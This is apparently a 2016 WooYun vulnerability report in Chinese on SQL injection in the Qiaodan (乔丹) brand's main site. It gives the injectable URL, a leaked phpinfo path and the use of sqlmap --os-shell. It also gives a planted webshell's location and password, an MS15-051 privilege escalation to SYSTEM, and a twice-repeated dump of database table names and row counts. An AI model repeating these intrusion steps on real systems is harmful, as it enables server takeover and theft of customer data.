当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193727

漏洞标题:乔丹主站SQL注入(泄漏大量订单/大量数据/root+dba写入shell/失败的内网漫游)

相关厂商:乔丹

漏洞作者: DeadSea

提交时间:2016-04-08 11:02

修复时间:2016-05-23 11:10

公开时间:2016-05-23 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这是我最失败的一次。。。

详细说明:

http://qiaodan.com/e/cpdh.php?classid=1


1.png


存在注入

1.png


root权限

1.png


dba权限开启。利用phpinfo泄漏的绝对路径
phpinfo地址:

http://www.qiaodan.com/VIP/php.php


绝对路径D:\WWW\VIP\
sqlmap命令 --os-shell

1.png

成功写入,上传一句话。我上传了很多 都是显示500然后群里的大牛告诉我,显示500不代表不执行,所以就直接拿菜刀连接了。没想到成功连接上了

1.png


http://www.qiaodan.com/VIP/sea.php 密码0


接下来就是我最失败的地方了。提权
上传了个cmd 没想到,执行失败。

1.png


之后各种上传aspx的马,无一例外都给杀了,最后上传了个执行cmd的aspx小脚本

1.png


能执行whoami/ipconfig/这些小命令,net user这些查看用户的完全显示不出来,不知道是不是脚本的问题。后来又各种上传exp。就成功了
用了MS15-051 直接获取了sy权限

1.png


添加管理员无回显。服务器端口1313
附带一个大黑阔提权成功图

1.png


数据

Database: u817646
+--------------------------------+---------+
| 
Table                          
| Entries |
+--------------------------------+---------+
| 
qiaodan_coode                  | 121720751 |
| 
qiaodan_vip                    | 524149  |
| 
qiaodan_vip_1603               | 524149  |
| 
qiaodan_vip_002                | 497357  |
| 
qiaodan_vip_151203             | 446909  |
| 
qiaodan_vip_1601               | 446909  |
| 
qiaodan_vip_1507               | 414938  |
| 
qiaodan_vip_150915             | 389539  |
| 
qiaodan_vip_151008             | 389539  |
| 
qiaodan_vip_1509               | 298000  |
| 
qiaodan_vip_1508               | 277857  |
| 
qiaodan_ecms_products_data_1   | 16539   |
| 
qiaodan_ecms_products_index    | 16539   |
| 
qiaodan_products               | 15771   |
| 
qiaodan_products55_copy        | 15237   |
| 
qiaodan_ecms_products          | 14712   |
| 
qiaodan_products2              | 14618   |
| 
qiaodan_ecms_products3         | 13712   |
| 
qiaodan_ecms_products2         | 13196   |
| 
qiaodan_ecms_products_data_1_2 | 13196   |
| 
qiaodan_ecms_products_index2   | 13196   |
| 
qiaodan_enewsdolog             | 10044   |
| 
qiaodan_viprecord              | 6866    |
| 
qiaodan_viprecord_copy         | 6356    |
| 
qiaodan_shopall_copy           | 5675    |
| 
tb_friend                      | 5613    |
| 
qiaodan_shopall                | 4992    |
| 
tb_game                        | 4692    |
| 
qiaodan_hlchange               | 4162    |
| 
tb_weibo                       | 3524    |
| 
qiaodan_baoming                | 3481    |
| 
tb_login                       | 2375    |
| 
qiaodan_lpchange               | 2037    |
| 
qiaodan_enewslog               | 1166    |
| 
tb_score                       | 1022    |
| 
tb_user                        | 1021    |
| 
qiaodan_enewssearchall         | 379     |
| 
tb_goodluck                    | 325     |
| 
qiaodan_baoming_copy           | 264     |
| 
qiaodan_kuz2013_picture        | 223     |
| 
hdzz_products2                 | 212     |
| 
hdzz_products                  | 196     |
| 
qiaodan_ecms_news              | 178     |
| 
qiaodan_ecms_news_data_1       | 178     |
| 
qiaodan_ecms_news_index        | 178     |
| 
qiaodan_enewsf                 | 176     |
| 
town_news_con                  | 175     |
| 
town_plus                      | 174     |
| 
qiaodan_enewstempbak           | 124     |
| 
waterfall                      | 123     |
| 
qiaodan_onlinebuy              | 101     |
| 
town_plus_set                  | 90      |
| 
qiaodan_eight_works            | 89      |
| 
qiaodan_enewsfile_1            | 88      |
| 
qiaodan_enewsfile_other        | 61      |
| 
tb_hys                         | 61      |
| 
qiaodan_2013qyh_picture        | 58      |
| 
qiaodan_enewstempdt            | 56      |
| 
town_news_cat                  | 56      |
| 
town_pageset                   | 56      |
| 
qiaodan_tech                   | 53      |
| 
town_menu                      | 52      |
| 
qiaodan_enewsclass             | 49      |
| 
qiaodan_enewsclass_copy        | 49      |
| 
qiaodan_enewsclass_stats       | 49      |
| 
qiaodan_enewsclassadd          | 49      |
| 
qiaodan_pinpai                 | 38      |
| 
qd_dyy_picture                 | 34      |
| 
qiaodan_ecms_tvc               | 33      |
| 
qiaodan_ecms_tvc_data_1        | 33      |
| 
qiaodan_ecms_tvc_index         | 33      |
| 
town_admin_auth                | 32      |
| 
town_admin_rights              | 31      |
| 
qiaodan_enewsbq                | 24      |
| 
town_link                      | 24      |
| 
qd_dyy_pro                     | 23      |
| 
town_form                      | 23      |
| 
qiaodan_eight_win              | 21      |
| 
qiaodan_lp                     | 21      |
| 
town_config                    | 21      |
| 
town_member_regform            | 21      |
| 
qiaodan_ecms_vip               | 19      |
| 
qiaodan_ecms_vip_data_1        | 19      |
| 
qiaodan_ecms_vip_index         | 19      |
| 
qiaodan_enewsad                | 19      |
| 
qiaodan_enewspage              | 19      |
| 
qiaodan_pinpai2                | 18      |
| 
qiaodan_enewslisttemp          | 16      |
| 
town_default_rights            | 16      |
| 
town_news_auth                 | 16      |
| 
qiaodan_enewsbqtemp            | 15      |
| 
qiaodan_pinpai_copy            | 15      |
| 
qiaodan_enewsnewstemp          | 14      |
| 
qiaodan_enewstempvar           | 14      |
| 
qiaodan_enewsmod               | 13      |
| 
qiaodan_enewstable             | 13      |
| 
town_stat_date                 | 12      |
| 
qiaodan_hl                     | 11      |
| 
daiyan                         | 10      |
| 
qiaodan_enewsclassnavcache     | 10      |
| 
qiaodan_seo                    | 10      |
| 
qiaodan_enewsfeedbackf         | 9       |
| 
town_coltype                   | 9       |
| 
town_member_rights             | 9       |
| 
town_secure                    | 9       |
| 
qiaodan_enewsclasstemp         | 8       |
| 
qiaodan_2013lzmarathon_picture | 7       |
| 
qiaodan_2013lzmarathon_seo     | 7       |
| 
qiaodan_enewspagetemp          | 7       |
| 
qiaodan_kuz2013_seo            | 7       |
| 
town_link_cat                  | 7       |
| 
qd_dyy_seo                     | 6       |
| 
qiaodan_2013lzmarathon_intro   | 6       |
| 
qiaodan_enewsshoppayfs         | 6       |
| 
qiaodan_gundong                | 6       |
| 
qiaodan_techclass              | 6       |
| 
town_advs_lb                   | 6       |
| 
town_member_func               | 6       |
| 
fengxing2_seo                  | 5       |
| 
qb_jfabout                     | 5       |
| 
qiaodan_enewsadclass           | 5       |
| 
qiaodan_enewsmemberf           | 5       |
| 
qiaodan_enewsnotcj             | 5       |
| 
town_cp_con                    | 5       |
| 
town_poll_data                 | 5       |
| 
`2012_seo`                     | 4       |
| 
hdzz_seo                       | 4       |
| 
qiaodan_admin                  | 4       |
| 
qiaodan_ecms_kuz               | 4       |
| 
qiaodan_ecms_kuz_data_1        | 4       |
| 
qiaodan_ecms_kuz_index         | 4       |
| 
qiaodan_enewsbqclass           | 4       |
| 
qiaodan_enewsplayer            | 4       |
| 
qiaodan_enewsshopps            | 4       |
| 
qiaodan_enewsuser              | 4       |
| 
qiaodan_enewsuseradd           | 4       |
| 
qiaodan_enewsuserloginck       | 4       |
| 
town_comment_cat               | 4       |
| 
qiaodan_ecms_zhanji            | 3       |
| 
qiaodan_ecms_zhanji_data_1     | 3       |
| 
qiaodan_ecms_zhanji_index      | 3       |
| 
qiaodan_enewsgroup             | 3       |
| 
qiaodan_enewspayapi            | 3       |
| 
qiaodan_enewsqmsg              | 3       |
| 
qiaodan_enewsvotetemp          | 3       |
| 
qiaodan_sina                   | 3       |
| 
tb_qqid                        | 3       |
| 
tb_reason                      | 3       |
| 
town_duty                      | 3       |
| 
qb_jfsort                      | 2       |
| 
qiaodan_enewsadminstyle        | 2       |
| 
qiaodan_enewsloginfail         | 2       |
| 
qiaodan_enewsmemberform        | 2       |
| 
qiaodan_enewspageclass         | 2       |
| 
qiaodan_enewspltemp            | 2       |
| 
qiaodan_enewsspacestyle        | 2       |
| 
qiaodan_enewsuserlist          | 2       |
| 
qiaodan_enewsuserlistclass     | 2       |
| 
qiaodan_enewswapstyle          | 2       |
| 
town_advs_page                 | 2       |
| 
town_cp_cat                    | 2       |
| 
town_down_cat                  | 2       |
| 
town_logo                      | 2       |
| 
town_member_type               | 2       |
| 
qiaodan_enewsclass_stats_set   | 1       |
| 
qiaodan_enewsclassf            | 1       |
| 
qiaodan_enewsdo                | 1       |
| 
qiaodan_enewsfeedbackclass     | 1       |
| 
qiaodan_enewsgbookclass        | 1       |
| 
qiaodan_enewsindexpage         | 1       |
| 
qiaodan_enewsjstemp            | 1       |
| 
qiaodan_enewslisttempclass     | 1       |
| 
qiaodan_enewsmember            | 1       |
| 
qiaodan_enewsmemberadd         | 1       |
| 
qiaodan_enewsmembergroup       | 1       |
| 
qiaodan_enewspicclass          | 1       |
| 
qiaodan_enewspl_set            | 1       |
| 
qiaodan_enewspostserver        | 1       |
| 
qiaodan_enewsprinttemp         | 1       |
| 
qiaodan_enewspublic            | 1       |
| 
qiaodan_enewspublic_update     | 1       |
| 
qiaodan_enewspubtemp           | 1       |
| 
qiaodan_enewssearchall_load    | 1       |
| 
qiaodan_enewssearchtemp        | 1       |
| 
qiaodan_enewsshop_set          | 1       |
| 
qiaodan_enewstempgroup         | 1       |
| 
qiaodan_session                | 1       |
| 
qiaodan_vipuser                | 1       |
| 
town_admin                     | 1       |
| 
town_advs_dl                   | 1       |
| 
town_advs_float                | 1       |
| 
town_advs_left                 | 1       |
| 
town_advs_pop                  | 1       |
| 
town_advs_right                | 1       |
| 
town_member                    | 1       |
| 
town_member_notice             | 1       |
| 
town_poll_config               | 1       |
|
town_poll_index                | 1       |
| 
town_stat_base                 | 1       |
| 
town_weather                   | 1       ||
+--------------------------------+---------+


还有许多sql注入就不贴出来了.

漏洞证明:

Database: u817646
+--------------------------------+---------+
| 
Table                          
| Entries |
+--------------------------------+---------+
| 
qiaodan_coode                  | 121720751 |
| 
qiaodan_vip                    | 524149  |
| 
qiaodan_vip_1603               | 524149  |
| 
qiaodan_vip_002                | 497357  |
| 
qiaodan_vip_151203             | 446909  |
| 
qiaodan_vip_1601               | 446909  |
| 
qiaodan_vip_1507               | 414938  |
| 
qiaodan_vip_150915             | 389539  |
| 
qiaodan_vip_151008             | 389539  |
| 
qiaodan_vip_1509               | 298000  |
| 
qiaodan_vip_1508               | 277857  |
| 
qiaodan_ecms_products_data_1   | 16539   |
| 
qiaodan_ecms_products_index    | 16539   |
| 
qiaodan_products               | 15771   |
| 
qiaodan_products55_copy        | 15237   |
| 
qiaodan_ecms_products          | 14712   |
| 
qiaodan_products2              | 14618   |
| 
qiaodan_ecms_products3         | 13712   |
| 
qiaodan_ecms_products2         | 13196   |
| 
qiaodan_ecms_products_data_1_2 | 13196   |
| 
qiaodan_ecms_products_index2   | 13196   |
| 
qiaodan_enewsdolog             | 10044   |
| 
qiaodan_viprecord              | 6866    |
| 
qiaodan_viprecord_copy         | 6356    |
| 
qiaodan_shopall_copy           | 5675    |
| 
tb_friend                      | 5613    |
| 
qiaodan_shopall                | 4992    |
| 
tb_game                        | 4692    |
| 
qiaodan_hlchange               | 4162    |
| 
tb_weibo                       | 3524    |
| 
qiaodan_baoming                | 3481    |
| 
tb_login                       | 2375    |
| 
qiaodan_lpchange               | 2037    |
| 
qiaodan_enewslog               | 1166    |
| 
tb_score                       | 1022    |
| 
tb_user                        | 1021    |
| 
qiaodan_enewssearchall         | 379     |
| 
tb_goodluck                    | 325     |
| 
qiaodan_baoming_copy           | 264     |
| 
qiaodan_kuz2013_picture        | 223     |
| 
hdzz_products2                 | 212     |
| 
hdzz_products                  | 196     |
| 
qiaodan_ecms_news              | 178     |
| 
qiaodan_ecms_news_data_1       | 178     |
| 
qiaodan_ecms_news_index        | 178     |
| 
qiaodan_enewsf                 | 176     |
| 
town_news_con                  | 175     |
| 
town_plus                      | 174     |
| 
qiaodan_enewstempbak           | 124     |
| 
waterfall                      | 123     |
| 
qiaodan_onlinebuy              | 101     |
| 
town_plus_set                  | 90      |
| 
qiaodan_eight_works            | 89      |
| 
qiaodan_enewsfile_1            | 88      |
| 
qiaodan_enewsfile_other        | 61      |
| 
tb_hys                         | 61      |
| 
qiaodan_2013qyh_picture        | 58      |
| 
qiaodan_enewstempdt            | 56      |
| 
town_news_cat                  | 56      |
| 
town_pageset                   | 56      |
| 
qiaodan_tech                   | 53      |
| 
town_menu                      | 52      |
| 
qiaodan_enewsclass             | 49      |
| 
qiaodan_enewsclass_copy        | 49      |
| 
qiaodan_enewsclass_stats       | 49      |
| 
qiaodan_enewsclassadd          | 49      |
| 
qiaodan_pinpai                 | 38      |
| 
qd_dyy_picture                 | 34      |
| 
qiaodan_ecms_tvc               | 33      |
| 
qiaodan_ecms_tvc_data_1        | 33      |
| 
qiaodan_ecms_tvc_index         | 33      |
| 
town_admin_auth                | 32      |
| 
town_admin_rights              | 31      |
| 
qiaodan_enewsbq                | 24      |
| 
town_link                      | 24      |
| 
qd_dyy_pro                     | 23      |
| 
town_form                      | 23      |
| 
qiaodan_eight_win              | 21      |
| 
qiaodan_lp                     | 21      |
| 
town_config                    | 21      |
| 
town_member_regform            | 21      |
| 
qiaodan_ecms_vip               | 19      |
| 
qiaodan_ecms_vip_data_1        | 19      |
| 
qiaodan_ecms_vip_index         | 19      |
| 
qiaodan_enewsad                | 19      |
| 
qiaodan_enewspage              | 19      |
| 
qiaodan_pinpai2                | 18      |
| 
qiaodan_enewslisttemp          | 16      |
| 
town_default_rights            | 16      |
| 
town_news_auth                 | 16      |
| 
qiaodan_enewsbqtemp            | 15      |
| 
qiaodan_pinpai_copy            | 15      |
| 
qiaodan_enewsnewstemp          | 14      |
| 
qiaodan_enewstempvar           | 14      |
| 
qiaodan_enewsmod               | 13      |
| 
qiaodan_enewstable             | 13      |
| 
town_stat_date                 | 12      |
| 
qiaodan_hl                     | 11      |
| 
daiyan                         | 10      |
| 
qiaodan_enewsclassnavcache     | 10      |
| 
qiaodan_seo                    | 10      |
| 
qiaodan_enewsfeedbackf         | 9       |
| 
town_coltype                   | 9       |
| 
town_member_rights             | 9       |
| 
town_secure                    | 9       |
| 
qiaodan_enewsclasstemp         | 8       |
| 
qiaodan_2013lzmarathon_picture | 7       |
| 
qiaodan_2013lzmarathon_seo     | 7       |
| 
qiaodan_enewspagetemp          | 7       |
| 
qiaodan_kuz2013_seo            | 7       |
| 
town_link_cat                  | 7       |
| 
qd_dyy_seo                     | 6       |
| 
qiaodan_2013lzmarathon_intro   | 6       |
| 
qiaodan_enewsshoppayfs         | 6       |
| 
qiaodan_gundong                | 6       |
| 
qiaodan_techclass              | 6       |
| 
town_advs_lb                   | 6       |
| 
town_member_func               | 6       |
| 
fengxing2_seo                  | 5       |
| 
qb_jfabout                     | 5       |
| 
qiaodan_enewsadclass           | 5       |
| 
qiaodan_enewsmemberf           | 5       |
| 
qiaodan_enewsnotcj             | 5       |
| 
town_cp_con                    | 5       |
| 
town_poll_data                 | 5       |
| 
`2012_seo`                     | 4       |
| 
hdzz_seo                       | 4       |
| 
qiaodan_admin                  | 4       |
| 
qiaodan_ecms_kuz               | 4       |
| 
qiaodan_ecms_kuz_data_1        | 4       |
| 
qiaodan_ecms_kuz_index         | 4       |
| 
qiaodan_enewsbqclass           | 4       |
| 
qiaodan_enewsplayer            | 4       |
| 
qiaodan_enewsshopps            | 4       |
| 
qiaodan_enewsuser              | 4       |
| 
qiaodan_enewsuseradd           | 4       |
| 
qiaodan_enewsuserloginck       | 4       |
| 
town_comment_cat               | 4       |
| 
qiaodan_ecms_zhanji            | 3       |
| 
qiaodan_ecms_zhanji_data_1     | 3       |
| 
qiaodan_ecms_zhanji_index      | 3       |
| 
qiaodan_enewsgroup             | 3       |
| 
qiaodan_enewspayapi            | 3       |
| 
qiaodan_enewsqmsg              | 3       |
| 
qiaodan_enewsvotetemp          | 3       |
| 
qiaodan_sina                   | 3       |
| 
tb_qqid                        | 3       |
| 
tb_reason                      | 3       |
| 
town_duty                      | 3       |
| 
qb_jfsort                      | 2       |
| 
qiaodan_enewsadminstyle        | 2       |
| 
qiaodan_enewsloginfail         | 2       |
| 
qiaodan_enewsmemberform        | 2       |
| 
qiaodan_enewspageclass         | 2       |
| 
qiaodan_enewspltemp            | 2       |
| 
qiaodan_enewsspacestyle        | 2       |
| 
qiaodan_enewsuserlist          | 2       |
| 
qiaodan_enewsuserlistclass     | 2       |
| 
qiaodan_enewswapstyle          | 2       |
| 
town_advs_page                 | 2       |
| 
town_cp_cat                    | 2       |
| 
town_down_cat                  | 2       |
| 
town_logo                      | 2       |
| 
town_member_type               | 2       |
| 
qiaodan_enewsclass_stats_set   | 1       |
| 
qiaodan_enewsclassf            | 1       |
| 
qiaodan_enewsdo                | 1       |
| 
qiaodan_enewsfeedbackclass     | 1       |
| 
qiaodan_enewsgbookclass        | 1       |
| 
qiaodan_enewsindexpage         | 1       |
| 
qiaodan_enewsjstemp            | 1       |
| 
qiaodan_enewslisttempclass     | 1       |
| 
qiaodan_enewsmember            | 1       |
| 
qiaodan_enewsmemberadd         | 1       |
| 
qiaodan_enewsmembergroup       | 1       |
| 
qiaodan_enewspicclass          | 1       |
| 
qiaodan_enewspl_set            | 1       |
| 
qiaodan_enewspostserver        | 1       |
| 
qiaodan_enewsprinttemp         | 1       |
| 
qiaodan_enewspublic            | 1       |
| 
qiaodan_enewspublic_update     | 1       |
| 
qiaodan_enewspubtemp           | 1       |
| 
qiaodan_enewssearchall_load    | 1       |
| 
qiaodan_enewssearchtemp        | 1       |
| 
qiaodan_enewsshop_set          | 1       |
| 
qiaodan_enewstempgroup         | 1       |
| 
qiaodan_session                | 1       |
| 
qiaodan_vipuser                | 1       |
| 
town_admin                     | 1       |
| 
town_advs_dl                   | 1       |
| 
town_advs_float                | 1       |
| 
town_advs_left                 | 1       |
| 
town_advs_pop                  | 1       |
| 
town_advs_right                | 1       |
| 
town_member                    | 1       |
| 
town_member_notice             | 1       |
| 
town_poll_config               | 1       |
|
town_poll_index                | 1       |
| 
town_stat_base                 | 1       |
| 
town_weather                   | 1       ||
+--------------------------------+---------+


修复方案:

版权声明:转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)